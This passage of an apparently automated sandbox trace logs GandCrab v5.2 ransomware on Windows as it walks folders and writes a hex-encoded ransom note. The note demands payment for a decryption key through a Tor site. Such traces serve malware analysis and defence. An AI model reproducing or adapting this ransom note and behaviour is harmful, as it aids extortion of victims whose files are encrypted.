(lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.504] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.504] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0073.504] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0073.504] CloseHandle (hObject=0x2bc) returned 1 [0073.504] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0073.504] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0073.504] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0073.504] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Templates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates" [0073.505] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\" [0073.505] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.505] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.505] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.505] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.506] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.506] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.506] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.506] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\\\TITWMVJL-DECRYPT.txt") returned 79 [0073.506] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0073.509] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39